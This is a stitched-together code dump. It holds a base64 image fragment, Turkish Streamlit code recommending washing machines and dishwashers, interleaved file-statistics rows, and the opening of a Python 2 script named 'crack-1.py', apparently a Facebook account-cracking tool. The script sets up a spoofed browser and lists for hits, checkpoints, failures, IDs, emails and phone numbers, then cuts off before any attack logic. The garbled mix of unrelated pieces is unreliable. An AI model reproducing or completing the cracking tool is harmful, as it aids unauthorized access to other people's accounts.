E9j0/ORWOrQ7aRaAfs1iBGUJon8ZfE1E350QgCzFqy4jOQEwW+D8CrMVkJxf8CGCsrNTU8Z/f1Lzkg63gLVO3+7tnR/uOGR/TIKvjG5MGTMo2PRtj2Vz2woy4XxaUi7Qs0loOmBqWPi/Ky0QcfO/fHSbd/euK/uEgcDW/wcQqiHbgiND+lLHrlm4hwwkFnn6IJ+1sLVp9LbDBH7CcqRcM/7Yu2AIGKNzM0svvO8kd88DkBphwtVkhoyOq9XVXcafWVH5c75G8p+jlg3hAIRwKNBqbhj0vDPj8rt2YWFvvny2vbqwy1PgNhM4Wsh2OV824xveoLNnXflOaEiPTqOo8RO/bPgexBvBdQaJBARc43Y3D8t9RvfvWRMF/cIKwUW+v263aHWaRiWk5Fz9+TCLi3n4veqNjyxdtdIAY+bsM+pWwm2fuvCUdHpvdOzjz3QQ8u23rdh78HLaKGMZhng7QRXAvDiaybceuztH2eB8OGmZ1beAMXDxGgo5U+KdhVcl4pKys9KrXpgythhJ4qBZzaUh342YWifjJS7L+habfx5R1XJU+t3/VTEdUHoCoo0gLcfvPTMcTlpyV0mf+vld9uqDzftDworiGQCjwdVpMEznl8wY1Rr971PKKvcNH95ttO+IaqXQVeG7ElgWSKZl5OeMsSBqN19sIGHQ3pvbG2vb2hpD11VelJi9PiQ7MySmqaWWyC1Z6cmPVbZ2JRx4HDrVaLcnHtlehXgqVnJiVfmZiTPc9Hqm1pnU2qobW5RHKMXoJrQixi5J6m5/c5fXnd+Z4XcbZxUmevQRIlToNBMBAPamTLPhzgwtJwkqwgkKLR9ZD7Bd0UVK8ZVHXUL8L+w0ILyyk5JEocBe4sKva1m0LhM0lJKX5cpk0KdxECpDSBb2LnH8giJ9z58zVlB3TvhOCmAW55c06c9OR7A2K916jCF6zuaCoXGPFBbR32SA9MRk/1OwABB09jRdOAlQKci5qWdYhUqzXyrwyYE0B1BLH0W5EQ4toEIDQsBxep86GimUCHyoXnTJjx8ssOfMAaOnXzj/FW5iNoKTHZvKG/jSHOt3f4S9ByJTmg1aPsABSWhPPA1wSxJIVtPCiIAxTIQiYCPBbAAsAxBNxLcGoRigqH0bpTQK8QQoEMElrQ55jw2Y+Kev3X4DwUQJsxcsHImIu6GvC9jzgR1BMQ5oTBT5AMoSyPwDIAa0c+GWx+RpGMXTBVOjKZUEV5oIE7v0INM++Q2lkQzoCSAmYLqg6BrwFYz3jn36qIg0X/o+ND3gbDC7PlvDUaSjrS3ea9Ei1yuZAc+I3S0eNmSLjKqPYi5Luw0BjmSWbFzoBHvkD7ewUGQbyOsIKgQoO99/12sd3joo0MifzZv2rmPdqfKT+xC3X/Y+WZw+HN07YoSEvbH7rNc+oIRaQT/GDNsrRR6qOFZ51AjTONCi2rO0EiOFVkCeSbRUSAepocXH6yW2u6fN2NyzYde+UdloRMt9NVFi5J6r7qs7f77oFkL3npJ1HAQy2j2A3r79MBU3vHuZQUdIhbR5jFqaRpJoRJiEoghnW7IlZ1g7btzZ0x4++Me/IP5H8mFui/eIYAl9DglZmvFo1dddPCLzy07zeLoYoOvdtrPCb0CaD3AfLlPoUUHIR8W+msJ+yQWN6JsW2jKP+nB/y4A3TedNX/psOIZ520L30M9BcWnk14Tyt6ZC1Ze0aiyP6UgP/ejsMrHBfSJLPBxN/lHzv+nB/B/jzziqZ3jZRgAAAAASUVORK5CYII=)](https://www.linkedin.com/in/do%C4%9Fukando%C4%9Fru/)") st.markdown("[![Foo](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAAXNSR0IArs4c6QAACepJREFUaEO9WntwXFUZ/33n7gZM7i6ltLaCQ4Vm76ZFaiHdu03Loz6YIgoyQCl1KIijlKEgICD44ik4aEEoDo8OKoLQVuAPEYHBUQsI7e4mlJelu5tWqli0BJjsvUnaZO/5nHN2b9gke7ObNOH+leSc8zvf73ud73wnhAn4mo5IzqCwXALGQiJqYYkjIXg6MTUBICZ2wegCaCcEZYXkLV6Y/9azLfPf/d2exgsQnds2VRblCgavFICtBB0zFiNDhIdYYL2zPf3+mNePZ9PG+OJDDW/gSklYJQhKw/v9SUaPIKzzKLymN/vS7rEA1q+11tZwpGBcLoHrRwrOfUz8IrF4niC3kuSckOj6cGdHtxJmanMy6pE3jQVZzJjPTEsgcDwxGiuF1USAG52odyc6OgbqIVIXgeicZEx6vJGAY4ZsCKQE830HiIYnurIvOfVs6M+ZPneJubfYeyYTVhGjrXItE78iiqHlhR2bO2th1iQQsezTmfkhIooMgkm0s4Fr3Gz6r7U2qGfcjCc/T5JvAyHhz2dwgUic52RTfxgNY1QCEcv+FsD3AWQoECb0gul7bi51LwBZj3BjmCPMeGIVS/r5Ry7KHkAXObn0A0E4gQRKwmPdYKAzbWeWZ7mdmX+MQagxTzWbk3NJeI8DYk55MQO4MIhEVQLKbQB+fFDzwMsiZJxa2Lb5gzFLNI4FBx193MFyb/+TIBxXWs4eyDjDyW55cjjcCAI6YIuyw/d5JmxuOmDvSf97/fWeccgy7iWHHtra6DSGnoPgxZoCuCC8UOvwwB5KoLU1bDpGajDbMG2nsFj8cWl+ONuSJQZeBnGLJsGywz3MXIhNm4r+3CEEIjH7ahB+VjZbHxtsu2+1vzkEuLU1HHXFF8mT+e7Ojh3jVnHFwoNiC45UZ0TBlH8Znv/N5sRRMChdcWZc6eTSd4wgoE5YIQeyRDDVIDFfVshn1g4X0IwlTiCi5/Uc4FVmWuvkU78dR1YSEcteycBlvsWZ+UQ3n3lh+J7RmH0pE7QszOxwGJZfRw1aINJs3w6B75b8DVvd3KwE8Jg3AiyevJmZf1T5d0UEoB8yIQxmVRfNl6BpBJ7GzAQS7wmJ9yGkmpchgV4u4icQWDAEh+nmQj513UirLjPM+NtpYjpWjxGvcbKZq8tKBFRh5g14//LzLxF/uZDNPFvNPSKW/SCA8yfCdYZjSNCDPbnUBdWwoy32UpbQMjHDNQ5sOLz7jb9/qC1gWsnVBP6lHiR+xc1mWoMEjFjJhwE+dzIIAHjYyaXPC8I2YwvaiYSWjYkvdrOZezWBJiuZEtCmV+wucvPp+wNBLPt6Am6YDAJMfJ2bzdwcTCB5IRFr2VR6d7PpRaQuIyLM7+qYZPSLAxtmKtMEgURjyZuY+MeTQYDANxVymeuDsKd8Zv4Ur6FBXYIOKGXVgRlkWonlBNpQXvSCk0ufGCi8lUgwsNk/oSecBHNRCGrrzqbbA104bm8CQ8vIhLPJjCXuJKLLShE9ugYilv0MgJMnXPChgE87ufRXgpVo38CAb6VfkBmznyXC0pL/01luPvVE1Swwt20qF4t7Jk37g5uyB0Ezgq6YZix5JpGq0/T3NJmWnSegWf0mhTGvZ/vmN6oSsJKnMPhPk6x9DU+QpxRy7craI76mlrajhfRe1wqXyCkLdBHhEE0gxJ8K6hREYskLQPzrj4MAmL7p5FO/qUpgbmKmKJJKOurE7aJIzN4HQoP6PeJ6Tbt3d/QGWGAlgx/6OAgQ8bmFbOaRanvNmDevqXfvgW55bN8QAqGiN8W/iA9fHI0nTmamqmadaFJC0tLuztRz1XDLqdRP8/uGuBB5RizoIt0US8wXRFsnWthqeJLocz3ZlPbzEYqck4yxx7lBFzItu5OA2Tp4JLUVOlNbqgu5zDBjb+8hoqmTSoLR5eRnzaxWSGo3b0ksgqSXdAgw54emUaJlbjblp6gRcpqW/SgBKyaTADMecfPpwFrLjCfOJqaNWgZJz5AZT95FzN8pM7rLzWcuDxKw7EYdAMTkkGBPkjg2yH3UnqZlryXg0rK8d1I0Zq9gwqPahYBXC7n0kObVcEFNy76bgEsmgwATrXWzKV0VBH2R2ILXQGKeJkC8nJpKeVX1I1VlKgFvhpPr6AqGWGZErV3rGVg2kSQI+H0hN+vrQb6vtT970SfJKKozQHkAsxeaqcvpSMxOD3bFmK528qk1NYRTsbMK4Fv2N6iZ+QOAfuDm06oHpXpAwdq3EtcC9FOtffAWN5dp0wSiln0JA3eXBrDTzaVj/h3XbE6cyIJuM0Ad0jNudHe8vMffQbc+mkLLQfgqwMcDmF6nVd4D8QuQeMrpC23EO5v7aq9bZkSsXaqJMKtMYLWby9xTskCLfYj0sGuwpUd0ekVPUl2+lUWuAONdAXlcd759Z7UNq3QQhk3jvYLo+NHK5SAiZjx5FjE/psZVF9sIG4erds9Hl3rLVq2KK8pW6HT7G4/G25v2+oCmlbyOwDcC/JrT37SwcsyfU899mcAbCrnMmFKxsnR3k3hTEB1R2otud3Kpq/RP/uYj2yojOgQiEluwVWUAHXD9jecPIVFqiu0hYMpo7qC01xP1Dq63/689xErcCtD3tXKD2irlYK5obGGfELS4e3tK5X39mbHEGUTk3xd2gbEBoC6GPIyITgJwVG1fBooeH963I/PveuZGrQU2s3jRLzgBVG9saTClRVdsGey/MO8uskj2dabeKW8mIs2JP0PQF+rZPGgOSzrK7Uxtq4UxZc6iWZ5XVKXNzJL2a7QW1aTo7LZmaRQ7CBQt+9irDRQ+wX+BmRZfHOnn/nUMOqeWAPtDQFed4Qal+c+W47LbkF7r8HZm9fZ6PPk1sHzCvz6qE3pA0qkVlsBBza2zPTK+BMJMARS4FE+310OqlgW05ovFp3zhwVwE4wynM/PH4fj1P3CA/+NJPrW3s71qSa1SKAka2ggOYDMagajufJB6B9Buo48mwredbPpX1eBqPTGdD+YHQBQqQ6mXwzucgcYbhqfR/Sbw6bZPRBu9axi4ttz30Q8bzOJiN59Sp3TVr/YjX3zhaczew35MlIIJWQKucvLppytO7PFaQB2UpzGwxr+X+D5PkldWc5tKJjUJDAa2GNjg9yV9AHWhEELcUxTFjYYX+gbAt9YTAyoVeoa33vCMFQysJuDIynUq2xjMy+t5f6iLgAZfsiQUfbdvtWR5U6U16hS4rmm6RCCsKYTcW7FtW389i+onUEbT5beHK1nSRf5jSD0bjTZHtcuJ6H4ZkmvG+g8gYybgC6Ler7z+fecAtJIYC8fxfxfM4BQgfidCYv143+HGTaBSo2bzMdNhhJeQh4UQaGHWTYJp2kIMYrAL0HtE+CeAt5h4C4rhTZWl+Xit+H+mCGntW0TDWgAAAABJRU5ErkJggg==)](https://github.com/dogudogru)") elif machine =="Çamaşır Makinesi": with st.sidebar: capacity_options = [' ','Düşük Kapasite','Orta Kapasite', 'Yüksek Kapasite'] capacity_help = '''Düşük kapasite: 0-6 KG , Orta Kapasite: 7-10 KG, Yüksek Kapasite: 10+ KG'''.strip() capacity = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin kapasitesi ne kadar olmalı?',options=capacity_options,help=capacity_help) cycle_options = [' ',"Düşük Devir","Orta Devir","Yüksek Devir"] cycle_help = '''Düşük devir: 1000'e kadar, Orta devir: 1000 - 1200, Yüksek Kapasite: 1200+'''.strip(",") cycle = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin devir sayısı ne olmalı?',options=cycle_options,help=cycle_help) size_options = [' ',"Küçük boyut","Standart Boyut","Standard üstü"] size = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin büyüklüğü ne kadar olmalı?',options=size_options) energy_usage_options = [' ','Çok önemli', 'Önemli', 'Az önemli', 'Önemsiz'] energy_usage_help = '''Çok Önemli: A+++ A++, Önemli : A+ A, Az Önemli: B C, Önemsiz: D E F G)'''.strip() energy_usage = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin tükettiği enerji miktarı sizin için önemli mi?',options=energy_usage_options,help=energy_usage_help) soru_list = [capacity,cycle,size,energy_usage] soru_list1 = ["capacity","cycle","size","energy_usage"] soru_list2 = [capacity,cycle,size,energy_usage] if all([i == " " for i in soru_list2]): st.title('Bakalım sizin için nelerimiz var?') col1, col2, col3, col4, col5 = st.columns([1,1,1,1,1]) data3 = data2.sample(frac=1).drop_duplicates(['brand']).sample(10).reset_index() im1 = Image.open(requests.get(data3.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(data3.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(data3.image[2], stream=True).raw).resize((100,150)) im4 = Image.open(requests.get(data3.image[3], stream=True).raw).resize((100,150)) im5 = Image.open(requests.get(data3.image[4], stream=True).raw).resize((100,150)) im6 = Image.open(requests.get(data3.image[5], stream=True).raw).resize((100,150)) im7 = Image.open(requests.get(data3.image[6], stream=True).raw).resize((100,150)) im8 = Image.open(requests.get(data3.image[7], stream=True).raw).resize((100,150)) im9 = Image.open(requests.get(data3.image[8], stream=True).raw).resize((100,150)) im10 = Image.open(requests.get(data3.image[9], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.markdown(data3.brand[0]) b6 = st.image(im6, width=120) st.markdown(data3.brand[5]) with col2: b2 = st.image(im2, width=120) st.markdown(data3.brand[1]) b7 = st.image(im7, width=120) st.markdown(data3.brand[6]) with col3: b3 = st.image(im3, width=120) st.markdown(data3.brand[2]) b8 = st.image(im8, width=120) st.markdown(data3.brand[7]) with col4: b4 = st.image(im4, width=120) st.markdown(data3.brand[3]) b9 = st.image(im9, width=120) st.markdown(data3.brand[8]) with col5: b5 = st.image(im5, width=120) st.markdown(data3.brand[4]) b10 = st.image(im10, width=120) st.markdown(data3.brand[9]) elif any([i != " " for i in soru_list2]): for m in soru_list2: if m == " ": pass else: m_index = soru_list2.index(m) len_lst1.append(soru_list1[m_index]) len_lst2.append(m) for k in range(0,len(len_lst2)): dataf = dataf[dataf[len_lst1[k]] == len_lst2[k]] if len(dataf) == 0: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulunamadı") elif len(dataf) == 1: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulundu") dataf = dataf.reset_index() im1 = Image.open(requests.get(dataf.image[0], stream=True).raw).resize((100,150)) b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) elif len(dataf) == 2: st.title("Seçilen Kriterlere Uygun İki Ürün Bulundu") col1, col2 = st.columns([1,1]) dataf = dataf.reset_index() im1 = Image.open(requests.get(dataf.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf.brand[1]) st.title("Fiyat") st.title(dataf.price[1]) elif len(dataf) == 3: st.title("Seçilen Kriterlere Uygun Üç Ürün Bulundu") col1, col2, col3 = st.columns([1,1,1]) im1 = Image.open(requests.get(dataf.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(dataf.image[2], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf.brand[1]) st.title("Fiyat") st.title(dataf.price[1]) with col3: b3 = st.image(im3, width=120) st.title(dataf.brand[2]) st.title("Fiyat") st.title(dataf.price[2]) elif len(dataf) >3: st.title("Seçilen Kriterlere En Uygun Ürünler") ucuz = dataf.sort_values(by="price", ascending=True).reset_index() fp1 = dataf[dataf["puan"] > dataf["puan"].quantile(0.25)].sort_values(by="puan", ascending=False).reset_index() fp1 = fp1.drop(["index"],axis=1) fp2 = fp1[fp1["price"] <dataf["price"].quantile(0.75)].sort_values(by="puan", ascending=False).reset_index() fp2 = fp2.drop(["index"],axis=1) fp3 = fp2.sort_values(by="puan", ascending=False).reset_index() fp3 = fp3.drop(["index"],axis=1) if len(fp3.puan) == 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp3.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif len(fp3.puan) == 1: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp1.full_name[0] ) st.markdown("Fiyat : " + str(fp1.price[0]) ) elif len(fp3.puan) > 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif machine =="Bulaşık Makinesi": capacity_options = [' ','Düşük Kapasite','Orta Kapasite', 'Yüksek Kapasite'] capacity_help = '''Düşük kapasite: 12 Kişilik ve Altı , Orta Kapasite: 13 Kişilik, Yüksek Kapasite: 14 Kişilik ve Üstü'''.strip() capacity = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin kapasitesi ne kadar olmalı?',options=capacity_options,help=capacity_help) type_options = [' ',"Solo","Ankastre"] type_help = '''Kullanım Tipi'''.strip(",") type_ = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin kullanım tipi nasıl olmalı?',options=type_options,help=type_help) size_options = [' ',"Küçük boyut","Standart Boyut","Standard üstü"] size = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin büyüklüğü ne kadar olmalı?',options=size_options) energy_usage_options = [' ','Çok önemli', 'Önemli', 'Az önemli', 'Önemsiz'] energy_usage_help = '''Çok Önemli: A+++ A++, Önemli : A+ A, Az Önemli: B C, Önemsiz: D E F G)'''.strip() energy_usage = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin tükettiği enerji miktarı sizin için önemli mi?',options=energy_usage_options,help=energy_usage_help) box_options = [' ',"Sepetli","Çekmeceli"] box_help = '''Çatal Kaşık Bölmesi Tipi'''.strip(",") box = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin çatal kaşık bölmesi nasıl olmalı?',options=box_options,help=box_help) soru_list = [capacity,type_,size,energy_usage,box] soru_list1 = ["capacity","type_","size","energy_usage","box"] soru_list2 = [capacity,type_,size,energy_usage,box] if all([i == " " for i in soru_list2]): st.title('Bakalım sizin için nelerimiz var?') col1, col2, col3, col4, col5 = st.columns([1,1,1,1,1]) data2_b = data2_b[data2_b.image != "YOK"] data3 = data2_b.sample(frac=1).drop_duplicates(['brand']).sample(10).reset_index() im1 = Image.open(requests.get(data3.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(data3.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(data3.image[2], stream=True).raw).resize((100,150)) im4 = Image.open(requests.get(data3.image[3], stream=True).raw).resize((100,150)) im5 = Image.open(requests.get(data3.image[4], stream=True).raw).resize((100,150)) im6 = Image.open(requests.get(data3.image[5], stream=True).raw).resize((100,150)) im7 = Image.open(requests.get(data3.image[6], stream=True).raw).resize((100,150)) im8 = Image.open(requests.get(data3.image[7], stream=True).raw).resize((100,150)) im9 = Image.open(requests.get(data3.image[8], stream=True).raw).resize((100,150)) im10 = Image.open(requests.get(data3.image[9], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.markdown(data3.brand[0]) b6 = st.image(im6, width=120) st.markdown(data3.brand[5]) with col2: b2 = st.image(im2, width=120) st.markdown(data3.brand[1]) b7 = st.image(im7, width=120) st.markdown(data3.brand[6]) with col3: b3 = st.image(im3, width=120) st.markdown(data3.brand[2]) b8 = st.image(im8, width=120) st.markdown(data3.brand[7]) with col4: b4 = st.image(im4, width=120) st.markdown(data3.brand[3]) b9 = st.image(im9, width=120) st.markdown(data3.brand[8]) with col5: b5 = st.image(im5, width=120) st.markdown(data3.brand[4]) b10 = st.image(im10, width=120) st.markdown(data3.brand[9]) elif any([i != " " for i in soru_list2]): for m in soru_list2: if m == " ": pass else: m_index = soru_list2.index(m) len_lst1.append(soru_list1[m_index]) len_lst2.append(m) for k in range(0,len(len_lst2)): dataf_b = dataf_b[dataf_b[len_lst1[k]] == len_lst2[k]] if len(dataf_b) == 0: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulunamadı") elif len(dataf_b) == 1: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulundu") dataf_b = dataf_b.reset_index() im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) elif len(dataf_b) == 2: st.title("Seçilen Kriterlere Uygun İki Ürün Bulundu") col1, col2 = st.columns([1,1]) dataf_b = dataf_b.reset_index() im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf_b.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf_b.brand[1]) st.title("Fiyat") st.title(dataf_b.price[1]) elif len(dataf_b) == 3: st.title("Seçilen Kriterlere Uygun Üç Ürün Bulundu") col1, col2, col3 = st.columns([1,1,1]) im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf_b.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(dataf_b.image[2], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf_b.brand[1]) st.title("Fiyat") st.title(dataf_b.price[1]) with col3: b3 = st.image(im3, width=120) st.title(dataf_b.brand[2]) st.title("Fiyat") st.title(dataf_b.price[2]) elif len(dataf_b) >3: st.title("Seçilen Kriterlere En Uygun Ürünler") ucuz = dataf_b.sort_values(by="price", ascending=True).reset_index() fp1 = dataf_b[dataf_b["puan"] > dataf_b["puan"].quantile(0.25)].sort_values(by="puan", ascending=False).reset_index() fp1 = fp1.drop(["index"],axis=1) fp2 = fp1[fp1["price"] <dataf_b["price"].quantile(0.75)].sort_values(by="puan", ascending=False).reset_index() fp2 = fp2.drop(["index"],axis=1) fp3 = fp2.sort_values(by="puan", ascending=False).reset_index() fp3 = fp3.drop(["index"],axis=1) if len(fp3.puan) == 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp3.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif len(fp3.puan) == 1: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp1.full_name[0] ) st.markdown("Fiyat : " + str(fp1.price[0]) ) elif len(fp3.puan) > 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[3] ) st.markdown("Fiyat : " + str(fp3.price[3]) )
93.256822
6,152
0.739789
9,066
116,198
9.421575
0.086256
0.012129
0.0205
0.024117
0.959738
0.947984
0.939836
0.938747
0.937518
0.933701
0
0.115551
0.168006
116,198
1,245
6,153
93.331727
0.767874
0.001076
0
0.811357
0
0.027911
0.581019
0.000709
0
1
0
0
0
1
0
false
0.00385
0.012512
0
0.012512
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
0
0
0
0
1
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
9
8d466268be4ca43162627719017d043b4440acde
70
py
Python
toon/anim/__init__.py
aforren1/peacoat
73c4c8f3fe429de262d32948ee43f2d5dde05570
[ "MIT" ]
null
null
null
toon/anim/__init__.py
aforren1/peacoat
73c4c8f3fe429de262d32948ee43f2d5dde05570
[ "MIT" ]
64
2017-06-11T21:18:12.000Z
2021-11-09T15:48:04.000Z
toon/anim/__init__.py
aforren1/toon
73c4c8f3fe429de262d32948ee43f2d5dde05570
[ "MIT" ]
null
null
null
from toon.anim.player import Player from toon.anim.track import Track
23.333333
35
0.828571
12
70
4.833333
0.5
0.275862
0.413793
0
0
0
0
0
0
0
0
0
0.114286
70
2
36
35
0.935484
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
8d6673575db1b884e0fb7de7d14b8d88f1c1c412
69,909
py
Python
crack-1.py
EmZee07/Zee007
3822cc6ccd096bb68d2872e0cf3348bbde0ba897
[ "Apache-2.0" ]
null
null
null
crack-1.py
EmZee07/Zee007
3822cc6ccd096bb68d2872e0cf3348bbde0ba897
[ "Apache-2.0" ]
null
null
null
crack-1.py
EmZee07/Zee007
3822cc6ccd096bb68d2872e0cf3348bbde0ba897
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # mau ngapain bro mau recode ea buat sendiri lah bgst import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize from multiprocessing.pool import ThreadPool from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '\x1b[1;91m[!] Closed' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() logo = """ \033[1;91m╔═════════════════════════════════════════════╗ \033[1;91m║\033[1;93m* \033[1;97mAuthor \033[1;91m: \033[1;33m[OwL] \033[1;91m \033[1;91m║\033[1;93m* \033[1;97mGitHub \033[1;91m: \033[1;92m[https//:github.com/flyngdutchman] \033[1;91 \033[1;94m║\033[1;93m* \033[1;97mSupport \033[1;91m: \033[1;98m[Dominitriz] \033[1;95m[Bulus] \033[1;96m[EvilTwin] \033[1;95m \033[1;94m╚═══════════════════════\033[1;95m══════════════════════╝""" def tik(): titik = [ '. ', '.. ', '... '] for o in titik: print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading\x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) back = 0 threads = [] berhasil = [] cekpoint = [] gagal = [] idfriends = [] idfromfriends = [] idmem = [] id = [] em = [] emfromfriends = [] hp = [] hpfromfriends = [] reaksi = [] reaksigrup = [] komen = [] komengrup = [] listgrup = [] vulnot = '\x1b[31mNot Vuln' vuln = 